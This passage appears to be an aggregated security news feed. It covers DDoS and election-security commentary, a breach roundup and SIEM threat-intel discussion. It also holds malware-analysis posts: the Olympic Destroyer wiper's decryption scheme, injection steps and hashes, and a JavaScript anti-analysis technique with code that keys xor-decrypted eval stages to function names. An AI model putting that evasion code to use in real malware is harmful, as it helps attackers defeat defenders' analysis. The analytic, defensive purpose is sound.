  • CA Veracode's Application Security Platform can provide a secure audit trail of your compliance processes, including critical information such as application security scores; lists of all discovered flaws; and flaw status information (new, open, fixed, or re-opened). Summary data is also included for third-party assessments, including scores and top risk categories.
  • CA Veracode Static Analysis can ensure that your applications are not vulnerable to attack through exploits such as SQL injection and cross-site scripting, preventing potential data loss, brand damage, and ransomware infections.
  • CA Veracode Static Analysis can help meet the requirement (going into effect in March 2019) to encrypt non-public information, by assessing your applications’ cryptographic code for known vulnerabilities and ensuring encryption is implemented correctly.
  • CA Veracode Software Composition Analysis analyzes your applications to create an inventory of third-party commercial and open source components, alerting your developers to the presence of components with known vulnerabilities. When a new component vulnerability is exposed, you can quickly identify if any of your applications are at risk.
  • CA Veracode Manual Penetration Testing complements CA Veracode's automated scanning technologies with best-in-class penetration testing services.

More Information

To learn more about securing all the applications you develop or assemble from third-party code, and the applications you buy, download our guide for getting started with an application security program.

Read our FAQ for more information about who is affected by the regulation, and read our new guide explaining how you might meet the compliance requirements: Navigating the New York Department of Financial Services Cybersecurity Regulations.


US and European Agencies Warn about the Risk of International Cyber Threats

International cyber relations don’t feel very warm, safe and fuzzy these days. This past week Robert Mueller, the special counsel leading the Justice Department’s investigation into Russia’s possible meddling in the 2016 American elections, indicted 13 Russian nationals for creating information warfare propaganda campaigns. In the same week, Dan Coats, the United States Director of National Intelligence, issued his agency’s annual Worldwide Threat Assessment of the Intelligence Community. In that report the agency stated,

“The potential for surprise in the cyber realm will increase in the next year and beyond as billions more digital devices are connected—with relatively little built-in security—and both nation states and malign actors become more emboldened and better equipped in the use of increasingly widespread cyber toolkits. The risk is growing that some adversaries will conduct cyber attacks—such as data deletion or localized and temporary disruptions of critical infrastructure—against the United States in a crisis short of war.”

The report names Russia, North Korea and Iran as nation states that are most likely to launch cyber attacks on the United States. It also notes, “We expect the line between criminal and nation-state activity to become increasingly blurred as states view cyber criminal tools as a relatively inexpensive and deniable means to enable their operations.” Similarly, the Washington Post recently published an article on this subject of how hostile nations can hide behind “independent” hackers for hire to carry out their cyber war dirty work. It’s become difficult to discern who is a cyber terrorist acting on his/her own accord, and who is a mercenary of a hostile nation-state. Finding and punishing the perpetrators of course is a monumental task.

The concerns outlined by the intelligence report echo the concerns that we’ve written about in previous blog posts. We’ve written on the topic of cyber threats to critical infrastructure, and we’ve often noted how the technology to launch attacks has become cheaper, faster and simpler. In terms of distributed denial of service (DDoS) attacks, even “script kiddies” can launch a fairly serious attack.

Critical infrastructure organizations have to take steps to mitigate the possibility of DDoS and other cyber threats. The European Union Agency for Network and Information Security (ENISA), the European Union’s cybersecurity agency, is also concerned about potential attacks on critical infrastructure. The agency, founded in 2004, equips the European Union (EU) to prevent, detect and respond to cybersecurity problems. According to Signal, ENISA emphasizes in its “2017 Threat Landscape” report that “Cyber war is entering dynamically into the cyberspace creating increased concerns to critical infrastructure operators, especially in areas that suffer some sort of cyber crises.”

It’s worth noting that all 28 European Union member nations require organizations that provide critical infrastructure to comply with the new European Union Network and Information Systems (NIS) Directive, which must be in place by 9 May 2018. The UK’s draft legislation and related guidance have just been published, and the UK government is seeking input on the proposal from industry members, infrastructure providers, regulators and other interested parties. The UK will impose fines on critical infrastructure organizations (healthcare facilities, electricity, water, energy, digital and transportation utilities) whose lax security standards result in loss of service. For more on this subject, see Corero Vice President Scott Taylor’s blog post in The Energy Industry Times.

Is the US prepared? Some experts think we aren’t. An opinion piece published on February 14, 2018 is titled, “Our critical infrastructure isn't ready for cyber warfare.” It was written by Michael Myers, a lieutenant colonel in the U.S. Air Force and the deputy director and instructor at the Joint Command Control & Info Ops School at the Joint Forces Staff College.

Understandably, IT security teams are often overwhelmed with assessing the constantly evolving cyber threat landscape and prioritizing which security solutions to deploy. Overall, however, DDoS mitigation must be part of network defense because 1) volumetric DDoS attacks are becoming more common and can effectively cripple networks, and 2) low-threshold, sub-saturating DDoS attacks often mask more surgical security breaches, such as malware and ransomware attacks. (Data breaches and network disruptions often go hand in hand, launched by the same hackers.)

When considering which cybersecurity tools to deploy, critical infrastructure organizations should put automated DDoS protection high on the priority list.

Corero is the leader in real-time DDoS defense; if you need expert advice, contact us.

“Know Thyself Better Than The Adversary – ICS Asset Identification and Tracking”

Know Thyself Better Than The Adversary - ICS Asset Identification & Tracking. This blog was written by Dean Parsons. As SANS prepares for the 2018 ICS Summit in Orlando, Dean Parsons is preparing a SANS ICS Webcast to precede the event, a Summit talk, and a SANS@Night presentation. In this blog, Dean tackles some common … Continue reading Know Thyself Better Than The Adversary - ICS Asset Identification and Tracking

States Worry About Election Hacking as Midterms Approach

Mueller indictments of Russian cyber criminals put election hacking at top of mind

State officials expressed grave concerns about election hacking the day after Special Counsel Robert Mueller handed down indictments of 13 Russian nationals on charges of interfering with the 2016 presidential election. The Washington Post reports:

At a conference of state secretaries of state in Washington, several officials said the government was slow to share information about specific threats faced by states during the 2016 election. According to the Department of Homeland Security, Russian government hackers tried to gain access to voter registration files or public election sites in 21 states.

Although the hackers are not believed to have manipulated or removed data from state systems, experts worry that the attackers might be more successful this year. And state officials say reticence on the part of Homeland Security to share sensitive information about the incidents could hamper efforts to prepare for the midterms.

Mueller indictments of Russian cyber criminals put election hacking at top of mind

Granted, the Mueller indictments allege disinformation and propaganda-spreading using social media, not direct election hacking. However, taken together with the attacks on state elections systems, it is now indisputable that Russian cyber criminals used a highly sophisticated, multi-pronged approach to tamper with the 2016 election. While there have been no reported attacks on state systems since, there is no reason to believe that election hacking attempts by Russians or other foreign threat actors will simply cease; if anything, cyber criminals are likely to step up their game during the critical 2018 midterms this November.

These aren’t new issues; cyber security was a top issue leading up to the 2016 election. Everyone agreed then, and everyone continues to agree now, that more needs to be done to prevent election hacking. So, what’s the holdup?

One of the biggest issues in tackling election hacking is the sheer logistics of U.S. elections. The United States doesn’t have one large national “election system”; it has a patchwork of thousands of mini election systems overseen by individual states and local authorities. Some states have hundreds, even thousands of local election agencies; The Washington Post reports that Wisconsin alone has 1,800. To its credit, Wisconsin has encrypted its database and would like to implement multi-factor authentication. However, this would require election employees to have a second device, such as a cell phone, to log in – and not all of them have work-issued phones or even high-speed internet access.

Not surprisingly, funding is also a stumbling block. Even prior to the 2016 elections, cyber security experts were imploring states to ensure that all of their polling places were using either paper ballots with optical scanners or electronic machines capable of producing paper audit trails. However, as we head toward the midterms, five states are still using electronic machines that do not produce audit trails, and another nine have at least some precincts that still lack paper ballots or audit trails. The problem isn’t that these states don’t want to replace their antiquated systems or hire cyber security experts to help them; they simply don’t have the budget to do so.

Congress Must Act to Prevent Election Hacking

Several bills that would appropriate more money for states to secure their systems against election hacking are pending before Congress, including the Secure Elections Act. Congress can also release funding that was authorized by the 2002 Help America Vote Act, but never appropriated.

The integrity of our elections is the cornerstone of our nation’s democracy. Proactive cyber security measures can prevent election hacking, but states cannot be expected to go it alone; cyber attacks do not respect borders.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.


Olympic Destroyer: A new Candidate in South Korea

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

A new piece of malware has recently made the headlines, targeting several computers during the opening ceremony of the Olympic Games Pyeongchang 2018. While the Cisco Talos group, and later Endgame, have already covered it, we noticed a couple of interesting aspects not previously addressed that we would like to share: its taste for hiding its traces, and its peculiar decryption routine. We would also like to draw attention to how the threat uses multiple components to breach the infected system. This knowledge allows us to make our sandbox even more effective against emerging advanced threats, so we would like to share some of these findings.

The Olympic Destroyer

The malware is responsible for destroying (wiping out) files on network shares, making infected machines irrecoverable, and propagating itself with the newly harvested credentials across compromised networks.

To achieve this, the main executable file (sha1: 26de43cc558a4e0e60eddd4dc9321bcb5a0a181c) drops and runs the following components, all originally encrypted and embedded in the resource section:

  • a browsers credential stealer (sha1: 492d4a4a74099074e26b5dffd0d15434009ccfd9),
  • a system credential stealer (a Mimikatz-like DLL – sha1: ed1cd9e086923797fe2e5fe8ff19685bd2a40072 (for 64-bit OS), sha1: 21ca710ed3bc536bd5394f0bff6d6140809156cf (for 32-bit OS)),
  • a wiper component (sha1: 8350e06f52e5c660bb416b03edb6a5ddc50c3a59),
  • a legitimate signed copy of the PsExec utility used for lateral movement (sha1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095).

A wiper deleting data and logs

The wiper component is responsible for wiping data from the network shares, but it also destroys the attacked system by deleting backups, disabling services (Figure 1), and clearing event logs using wevtutil, thereby making the infected machine unusable. Very similar behaviors have previously been observed in other ransomware/wiper attacks, including infamous ones such as BadRabbit and NotPetya.


Figure 1. Disabling Windows services

After wiping the files, the malicious component sleeps for an hour (probably, to be sure that the spawned thread managed to finish its job), and calls the InitiateSystemShutdownExW API with the system failure reason code (SHTDN_REASON_MAJOR_SYSTEM, 0x00050000) to shut down the system.

An unusual decryption to extract the resources

As mentioned before, the executables are stored encrypted inside the binary’s resource section. This prevents static extraction of the embedded files, thus slowing down the analysis process. Another reason for going “offline” (compared with, e.g., the Smoke Loader) is to bypass network-based security solutions, which in turn decreases the probability of detection. When the malware executes, the resources are loaded via the LoadResource API and decrypted using MMX/SSE instructions, which malware sometimes uses to bypass code emulation; this is what we observed while debugging it. In this case, however, the instructions are used to implement the AES cipher and the MD5 hash function (instead of standard Windows APIs such as CryptEncrypt and CryptCreateHash) to decrypt the resources. The MD5 algorithm is used to generate the symmetric key, which is equal to the MD5 of the hardcoded string “123”, multiplied by 2.
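As a hedged sketch of that key derivation (TypeScript with Node's crypto module): we interpret "multiplied by 2" as the 16-byte MD5 digest concatenated with itself to form a 32-byte AES-256 key, and the cipher mode and IV below are assumptions for illustration only, not values recovered from the sample.

import { createHash, createDecipheriv } from "node:crypto";

// MD5("123") is 16 bytes; repeating it yields a 32-byte AES-256 key
// (our reading of "multiplied by 2").
function deriveKey(hardcoded: string): Buffer {
  const md5 = createHash("md5").update(hardcoded).digest();
  return Buffer.concat([md5, md5]);
}

function decryptResource(encrypted: Buffer): Buffer {
  const key = deriveKey("123");          // hardcoded string observed in the sample
  const iv = Buffer.alloc(16, 0);        // assumed IV, not recovered from the sample
  const decipher = createDecipheriv("aes-256-cbc", key, iv);   // mode is an assumption
  return Buffer.concat([decipher.update(encrypted), decipher.final()]);
}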

The algorithms can also be identified by looking at some characteristic constants:

  1. the Rcon array used during the AES key schedule (see Figure 2), and
  2. the MD5 magic initialization constants.

The decrypted resources are then dropped into a temporary directory and finally executed.

Figure 2. AES key setup routine for resources decryption

Hunting

An interesting aspect of the decryption is its usage of the SSE instructions. We exploited this peculiarity and hunted for other samples sharing the same code, for example by searching for the associated codehash. The latter is a normalized representation of the code mnemonics included in the function block (see Figure 3), as produced by the Lastline sandbox and exported as part of the process snapshots.
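Conceptually, a codehash can be thought of along these lines (a rough sketch, not Lastline's actual normalization): strip operands and addresses from the disassembly, keep only the mnemonic sequence, and hash it, so that functionally identical code with different registers or offsets collapses to the same value.

import { createHash } from "node:crypto";

function codeHash(disassembledLines: string[]): string {
  const mnemonics = disassembledLines
    .map((line) => line.trim().split(/\s+/)[0].toLowerCase())   // keep the mnemonic only
    .filter((m) => m.length > 0);
  return createHash("sha1").update(mnemonics.join(" ")).digest("hex");
}

// Two sequences differing only in their operands produce the same hash:
console.log(codeHash(["movdqa xmm1, xmm0", "pxor xmm1, xmm2", "aesenc xmm1, xmm3"]));
console.log(codeHash(["movdqa xmm4, xmm5", "pxor xmm4, xmm6", "aesenc xmm4, xmm7"]));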

Another interesting sample found during our investigation (sha1: 84aa2651258a702434233a946336b1adf1584c49) contained harvested system credentials belonging to Atos, a technical provider of the Pyeongchang games (see here for more details).


Figure 3. Hardcoded credentials of an Olympic Destroyer sample targeting the Atos company

A Shellcode Injection Wiping the Injector

Another peculiarity of the Olympic Destroyer is how it deletes itself after execution. While self-deletion is a common practice among malware, it is quite uncommon to see the injected shellcode taking care of it: the shellcode, once injected in a legitimate copy of notepad.exe, waits until the sample terminates, and then deletes it.


Figure 4. Checking whether the file is terminated or still running

This is done first by calling CreateFileW API and checking whether the sample is still running (as shown in Figure 4); it then overwrites the file with a sequence of 0x00 byte, deletes it via DeleteFileW API, and finally exits the process.

The remainder of the injection process is very common and it is similar to what we have described in one of our previous blog posts: the malware first spawns a copy of notepad.exe by calling the CreateProcessW function; then allocates memory in the process by calling VirtualAllocEx, and writes shellcode in the allocated memory through WriteProcessMemory. Finally, it creates a remote thread for its execution via CreateRemoteThread.


Figure 5. Shellcode injection in a copy of notepad.exe

Lastline Analysis Overview

Figure 6 shows what the analysis overview looks like when analyzing the sample discussed in this article:


Figure 6. Analysis overview of the Olympic Destroyer

Conclusion

In this article, we analyzed a variant of the Olympic Destroyer, a multi-component malware that steals credentials before making the targeted machines unusable by wiping data on the network shares and deleting backups. Additionally, the effort put into deleting its traces shows a deliberate attempt to hinder any forensic activity. We have also shown how Lastline found similar samples related to this attack based on an example of the decryption routine, and how we detect them. This is a perfect example of how threats are continuously improving, becoming stealthier and more difficult to extract and analyze.

Appendix: IoCs

Olympic Destroyer
26de43cc558a4e0e60eddd4dc9321bcb5a0a181c (sample analyzed in this article)
21ca710ed3bc536bd5394f0bff6d6140809156cf
492d4a4a74099074e26b5dffd0d15434009ccfd9
84aa2651258a702434233a946336b1adf1584c49
b410bbb43dad0aad024ec4f77cf911459e7f3d97
c5e68dc3761aa47f311dd29306e2f527560795e1
c9da39310d8d32d6d477970864009cb4a080eb2c
fb07496900468529719f07ed4b7432ece97a8d3d

The post Olympic Destroyer: A new Candidate in South Korea appeared first on Lastline.

Control Flow Integrity: a Javascript Evasion Technique

Understanding the real code behind a malware sample is a great opportunity for malware analysts: it increases the chances of understanding what the sample really does. Unfortunately, it is not always possible to figure out the "real code"; sometimes the analyst needs tools like disassemblers or debuggers in order to infer the malware's actions. However, when the sample is implemented in "interpreted code" such as (but not limited to) Java, JavaScript, VBS, or .NET, there are several ways to get a closer look at the "code".

Unfortunately, attackers know what the analysis techniques are, and they often implement evasive actions to reduce the analyst's understanding or to make the overall analysis harder. An evasive technique could be implemented to detect whether the code runs in a VM, to run the code only in given environments, to defeat debugging hooks, or to evade reverse-engineering operations such as de-obfuscation techniques. Today's post is about exactly that: I'd like to focus my readers' attention on a fun and innovative way to evade reverse-engineering techniques based on JavaScript.

JavaScript is becoming more important day by day as an attack vector; it is often used as a dropper stage, and its implementation is influenced by many flavours and coding styles, but as a bottom line, almost every JavaScript malware is obfuscated. The following image shows an example of an obfuscated JavaScript payload (taken from one of my analyses).

Example: Obfuscated Javascript


As a first step, the malware analyst would try to de-obfuscate the code by digging into it. From simple "cut and paste" to more powerful "substitution scripts", the analyst would rename functions and variables in order to reduce complexity and make clear what each code section does. But JavaScript offers a nice way to obtain the callee function's name, which can be used to detect whether a function name has changed over time: arguments.callee.caller. Using it, the attacker can build a stack trace in which the names of the executed functions are chained together. The attacker grabs those function names and uses them as the key to dynamically decrypt specific, crafted JavaScript code. With this technique the attacker gains an implicit control flow integrity check: if a function is renamed, or if the function order is slightly different from the designed one, the resulting "hash" will be different. If the hash is different, the generated key will be different as well, and it won't be able to decrypt and launch the specific encrypted code.

But let's take a closer look at what I mean. The following snippet shows a clear (not obfuscated) example of this technique; I decided to show non-obfuscated code here just to keep it simple.



Each internal stage evaluates ( eval() ) some content. On rows 21 and 25, the functions cow001 and pyth001 evaluate xor-decrypted content. The xor_decrypt function takes two arguments: the decoding_key and the payload to be decrypted. Each internal stage function uses the name of the callee, obtained through arguments.callee.name, as its decryption key. If the function name is the "designed" one (the one the attacker used to encrypt the payload), the encrypted content is executed with no exceptions. On the other hand, if the function has been renamed (for example by the analyst for convenience), the evaluation fails, and the attacker can potentially trigger a different code path (using a simple try/catch statement).
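Since the original screenshot is not reproduced here, the following is a rough reconstruction of the pattern it describes (written as TypeScript; the function names follow the post, while xor_decrypt and the payload bytes are illustrative). The post's sample obtains its own name via arguments.callee.name; this sketch references the function object directly, which breaks in exactly the same way if an analyst renames the function during de-obfuscation.

function xor_decrypt(decoding_key: string, payload: number[]): string {
  return payload
    .map((byte, i) => String.fromCharCode(byte ^ decoding_key.charCodeAt(i % decoding_key.length)))
    .join("");
}

function cow001(): void {
  // encrypted offline with the key "cow001": renaming this function changes the key,
  // so eval() receives garbage instead of the next stage
  const encrypted_payload: number[] = [/* bytes produced by the attacker's packer */];
  eval(xor_decrypt(cow001.name, encrypted_payload));
}

function pyth001(): void {
  const encrypted_payload: number[] = [/* bytes produced by the attacker's packer */];
  eval(xor_decrypt(pyth001.name, encrypted_payload));
}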

Before launching the sample in the wild, the attacker needs to prepare the "attack path" by developing the malicious JavaScript and obfuscating it. Once the obfuscation is done, the attacker needs an additional script (such as the sketch below) that encrypts each payload using the obfuscated function names as keys and substitutes the newly encrypted payloads into the final obfuscated JavaScript file.
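A hedged sketch of such a packing-time helper might look like this (the stage bodies and the xorEncrypt helper are illustrative; the real script would operate on the attacker's already-obfuscated function names and payloads):

function xorEncrypt(key: string, plaintext: string): number[] {
  return Array.from(plaintext, (ch, i) =>
    ch.charCodeAt(0) ^ key.charCodeAt(i % key.length));
}

// obfuscated function name -> the next-stage code that function must decrypt and eval()
const stages: Record<string, string> = {
  cow001: 'console.log("second stage");',
  pyth001: 'console.log("third stage");',
};

for (const [funcName, body] of Object.entries(stages)) {
  // paste each array back into the corresponding function in the final dropper
  console.log(`${funcName}: [${xorEncrypt(funcName, body).join(", ")}]`);
}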

The attacker is now able to write JavaScript code that enforces its own control flow. By iterating this concept over and over again, he can block or control the code execution, achieving a complete reverse-engineering evasion technique.
  
Watch out and be safe!

APT37 (Reaper): The Overlooked North Korean Actor

On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).

Our analysis of APT37’s recent activity reveals that the group’s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123.

Read our report, APT37 (Reaper): The Overlooked North Korean Actor, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations:

  • Targeting: Primarily South Korea – though also Japan, Vietnam and the Middle East – in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.
  • Initial Infection Tactics: Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing sites to distribute malware more indiscriminately.
  • Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.
  • Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.
  • Malware: A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware.

More information on this threat actor is found in our report, APT37 (Reaper): The Overlooked North Korean Actor. You can also register for our upcoming webinar for additional insights into this group.

It’s Five O’Clock Somewhere – Business Security Weekly #74

This week, Michael and Paul interview Joe Kay, Founder & CEO of Enswarm! In the Tracking Security Information segment, IdentityMind Global raised $10M, DataVisor raised $40M, & Infocyte raised $5.2M! Last but not least, our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/BSWEpisode74

 

Visit https://www.securityweekly.com/bsw for all the latest episodes!

Weekly Cyber Risk Roundup: Olympic Malware and Russian Cybercrime

More information was revealed this week about the Olympic Destroyer malware and how it was used to disrupt the availability of the Pyeongchang Olympics’ official website for a 12-hour period earlier this month.

It appears that back in December, a threat actor may have compromised the computer systems of Atos, an IT service provider for the Olympics, and then used that access to perform reconnaissance and eventually spread the destructive wiper malware known as “Olympic Destroyer.”

The malware was designed to delete files and event logs by using legitimate Windows features such as PsExec and Windows Management Instrumentation, Cisco researchers said.

Cyberscoop reported that Atos, which is hosting the cloud infrastructure for the Pyeongchang games, had been compromised since at least December 2017, according to VirusTotal samples. The threat actor then used stolen login credentials of Olympics staff to quickly propagate the malware.

An Atos spokesperson confirmed the breach and said that investigations into the incident are continuing.

“[The attack] used hardcoded credentials embedded in a malware,” the spokesperson said. “The credentials embedded in the malware do not indicate the origin of the attack. No competitions were ever affected and the team is continuing to work to ensure that the Olympic Games are running smoothly.”

The Olympic Destroyer malware samples on VirusTotal contained various stolen employee data such as usernames and passwords; however, it is unclear if that information was stolen via a supply-chain attack or some other means, Cyberscoop reported.


Other trending cybercrime events from the week include:

  • Organizations expose data: Researchers discovered a publicly exposed Amazon S3 bucket belonging to Bongo International LLC, which was bought by FedEx in 2014, that contained more than 119 thousand scanned documents of U.S. and international citizens. Researchers found a publicly exposed database belonging to The Sacramento Bee that contained information on all 19 million registered voters in California, as well as internal data such as the paper’s internal system information, API information, and other content. Researchers discovered a publicly exposed network-attached storage device belonging to the Maryland Joint Insurance Association that contained a variety of sensitive customer information and other credentials. The City of Thomasville said that it accidentally released the Social Security numbers of 269 employees to someone who put in a public record request for employee salaries, and those documents were then posted on a Facebook page.
  • Notable phishing attacks: The Holyoke Treasurer’s Office in Massachusetts said that it lost $10,000 due to a phishing attack that requested an urgent wire payment be processed. Sutter Health said that a phishing attack at legal services vendor Salem and Green led to unauthorized access to an employee email account that contained personal information for individuals related to mergers and acquisitions activity. The Connecticut Airport Authority said that employee email accounts were compromised in a phishing attack and that personal information may have been compromised as a result.
  • User and employee accounts accessed: A phishing attack led to more than 50,000 Snapchat users having their credentials stolen, The Verge reported. A hacker said that it’s easy to brute force user logins for Freedom Mobile and gain access to customers’ personal information. Entergy is notifying employees of a breach of W-2 information via its contractor’s website TALX due to unauthorized individuals answering employees’ personal questions and resetting PINs.
  • Other notable events: Makeup Geek is notifying customers of the discovery of malware on its website that led to the theft of personal and financial information entered by visitors over a two-week period in December 2017. The Russian central bank said that hackers managed to steal approximately $6 million from a Russian bank in 2017 in an attack that leveraged the SWIFT messaging system. Western Union is informing some customers of a third-party data breach at “an external vendor system formerly used by Western Union for secure data storage” that may have exposed their personal information.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.

[Chart: top trending cybercrime targets, week ending February 17, 2018]

Cyber Risk Trends From the Past Week

The U.S. government issued a formal statement this past week blaming the Russian military for the June 2017 outbreak of NotPetya malware. Then on Friday, the day after the NotPetya accusations, the Justice Department indicted 13 Russian individuals and three Russian companies for using information warfare to interfere with the U.S. political system, including the 2016 presidential election. Those stories have once again pushed the alleged cyber activities of the Russian government into the national spotlight.

A statement on NotPetya from White House Press Secretary Sarah Huckabee Sanders described the outbreak as “the most destructive and costly cyber-attack in history” and vowed that the “reckless and indiscriminate cyber-attack … will be met with international consequences.” Newsweek reported that the NotPetya outbreak, which leveraged the popular Ukrainian accounting software M.E. Doc to spread, cost companies more than $1.2 billion. The United Kingdom also publicly blamed Russia for the attacks, writing in a statement that “malicious cyber activity will not be tolerated.” A spokesperson for Russian President Vladimir Putin denied the allegations as “the continuation of the Russophobic campaign.”

It remains unclear what “consequences” the U.S. will impose in response to NotPetya. Politicians are still urging President Trump to enforce sanctions on Russia that were passed with bipartisan majorities in July. Newsday reported that congressmen such as Democratic Sen. Chuck Schumer and Republican Rep. Peter King have urged those sanctions to be enforced following Friday’s indictment of 13 Russians and three Russian companies.

The indictment alleges the individuals attempted to “spread distrust” towards U.S. political candidates and the U.S. political system by using stolen or fictitious identities and documents to impersonate politically active Americans, purchase political advertisements on social media platforms, and pay real Americans to engage in political activities such as rallies. For example, the indictment alleges that after the 2016 presidential election, the Russian operatives staged rallies both in favor of and against Donald Trump in New York on the same day in order to further their goal of promoting discord.

As The New York Times reported, none of those indicted have been arrested, and Russia is not expected to extradite those charged to the U.S. to face prosecution. Instead, the goal is to name and shame the operatives and make it harder for them to work undetected in future operations.

Evolving to Security Decision Support: Data to Intelligence

Posted under: Research and Analysis

As we kicked off our Evolving to Security Decision Support series, the point we needed to make was the importance of enterprise visibility to the success of your security program. Given all the moving pieces in your environment – including the usage of various clouds (SaaS and IaaS), mobile devices, containers, and eventually IoT devices – it’s increasingly hard to know where all your critical data is and how it’s being used.

So enterprise visibility is necessary, but not sufficient. You still need to figure out whether and how you are being attacked, as well as whether and how data and/or apps are being misused. Nobody gets credit just for knowing where you can be attacked. You get credit for stopping attacks and protecting critical data. Ultimately that’s all that matters. The good news is that many organizations already collect extensive security data (thanks, compliance!), so you have a base to work with. It’s really just a matter of turning all that security data into actual intelligence you can use for security decision support.

The History of Security Monitoring

Let’s start with some historical perspective on how we got here, and why many organizations already perform extensive security data collection. It all started in the early 2000s with the first SIEM deployments, which were meant to make sense of the avalanche of alerts coming from firewalls and intrusion detection gear. You remember those days, right?

SIEM evolution was driven by the need to gather logs and generate reports to substantiate controls (thanks again, compliance!). So SIEM products focused more on storing and gathering data than on actually making sense of it. You could generate alerts on things you knew to look for, which typically meant you got pretty good at finding attacks you had already seen. But you were pretty limited in your ability to detect attacks you hadn't seen.
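
To make that concrete, here is a minimal sketch of the kind of rule a traditional SIEM excels at. The event format, threshold, and window are made up for illustration; they are not from any particular product:

from collections import defaultdict

# Illustrative log events: (timestamp in seconds, source IP, login outcome)
events = [
  (100, "10.1.1.5", "fail"), (110, "10.1.1.5", "fail"),
  (115, "10.1.1.5", "fail"), (120, "10.1.1.5", "fail"),
  (125, "10.1.1.5", "fail"), (130, "10.1.1.5", "success"),
]

FAIL_THRESHOLD = 5   # the known-bad pattern we decided to look for
WINDOW = 60          # seconds

def brute_force_alerts(events):
  failures = defaultdict(list)
  alerts = []
  for ts, src, outcome in events:
    if outcome == "fail":
      # Keep only failures inside the sliding window, then add this one
      failures[src] = [t for t in failures[src] if ts - t <= WINDOW] + [ts]
    elif outcome == "success" and len(failures[src]) >= FAIL_THRESHOLD:
      alerts.append((src, ts))
  return alerts

print(brute_force_alerts(events))  # [('10.1.1.5', 130)]

The rule fires reliably on the pattern we thought to encode, and on nothing else, which is exactly the limitation described above.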

SIEM technology continues to evolve, but mostly to add scale and data sources to keep up with the number of devices and amount of activity to be monitored. But that doesn’t really address the fact that many organizations don’t want more alerts – they want better alerts. To provide better alerts, two separate capabilities have come together in an interesting way:

  1. Threat Intelligence: SIEM rules were based on looking for what you had seen before, so you were limited in what you could look for. What if you could leverage attacks other companies have seen and look for those attacks, so you could anticipate what’s coming? That’s the driver for external threat intelligence.

  2. Security Analytics: The other capability isn’t exactly new – it’s using advanced math to look at the security data you’ve already collected to profile normal behaviors, and then look for stuff that isn’t normal and might be malicious. Call it anomaly detection, machine learning, or whatever – the concept is the same. Gather a bunch of security data, build mathematical profiles of normal activity, then look for activity that isn’t normal.

Let’s consider both these capabilities to gain a better understanding how they work, and then we’ll be able to show how powerful integrating them can be for generating better alerts.

Threat Intel Identifies What Could Happen

Culturally, over the past 20 years, security folks were generally the kids who didn’t play well in the sandbox. Nobody wanted to appear vulnerable, so data breaches and successful attacks were the dirty little secret of security. Sure, they happen, but not to us. Yeah, right. There were occasional high-profile issues (like SQL*Slammer) which couldn’t be swept under the rug, but they hit everyone so weren’t that big a deal.

But over the past 5 years a shift has occurred within security circles, borne out of necessity as most such things are. Security practitioners realized no one is perfect, and we can collectively improve our ability to defend ourselves by sharing information about adversary tactics and specific indicators from those attacks. This is something we dubbed “benefiting from the misfortune of others” a few years ago. Everyone benefits because once one of us is attacked, we all learn about that attack and can look for it. So the modern threat intelligence market emerged.

In terms of the current state of threat intel, we typically see the following types of data shared within commercial services, industry groups/ISACs, and open source communities:

  • Bad IP Addresses: IP addresses which behave badly, for instance by participating in a botnet or acting as a spam relay, should probably be blocked at your egress filter, because you know no good will come from communicating with that network. You can buy a blacklist of bad IP addresses, probably the lowest-hanging fruit in the threat intel world.
  • Malware Indicators: Next-generation attack signatures can be gathered and shared to look for activity representative of typical attacks. You know these indicate an attack, so being able to look for them within your security monitors helps keep your defenses current.

The key value of threat intel is to accelerate the human, as described in our Introduction to Threat Operations research. But what does that even mean? To illustrate, consider retrospective search: being notified of a new attack via a threat intel feed, and then mining your existing security data with those indicators to see whether you were hit before you knew to look for it. Of course it would be better to detect the attack when it happens, but the ability to go back and search old security data for new indicators shortens the detection window.
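
As a rough sketch of the idea (assuming you keep parsed connection logs around and your intel feed delivers indicators as a simple list), retrospective search is little more than replaying new indicators over old data:

# Hypothetical stored connection logs: (timestamp, source host, destination IP)
historical_logs = [
  ("2018-01-03T10:22:00", "workstation-12", "203.0.113.50"),
  ("2018-01-09T14:05:00", "workstation-07", "198.51.100.23"),
  ("2018-02-01T09:41:00", "server-02", "192.0.2.77"),
]

# Indicators that just arrived in a threat intel feed
new_indicators = {"198.51.100.23", "192.0.2.77"}

def retrospective_search(logs, indicators):
  # Return every historical event that matches an indicator we only learned about today
  return [event for event in logs if event[2] in indicators]

for hit in retrospective_search(historical_logs, new_indicators):
  print("Possible earlier compromise:", hit)

In practice this runs against a log store or SIEM rather than an in-memory list, but the logic is the same.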

Another use of threat intel is to refine your hunting process. This involves having a hunter learn about a specific adversary’s tactics, and then undertake a hunt for that adversary. It’s not like the adversary is going to send out a memo detailing its primary TTPs, so threat intel is the way to figure out what they are likely to do. This makes the hunter much more efficient (“accelerating the human”) by focusing on typical tactics used by likely adversaries.

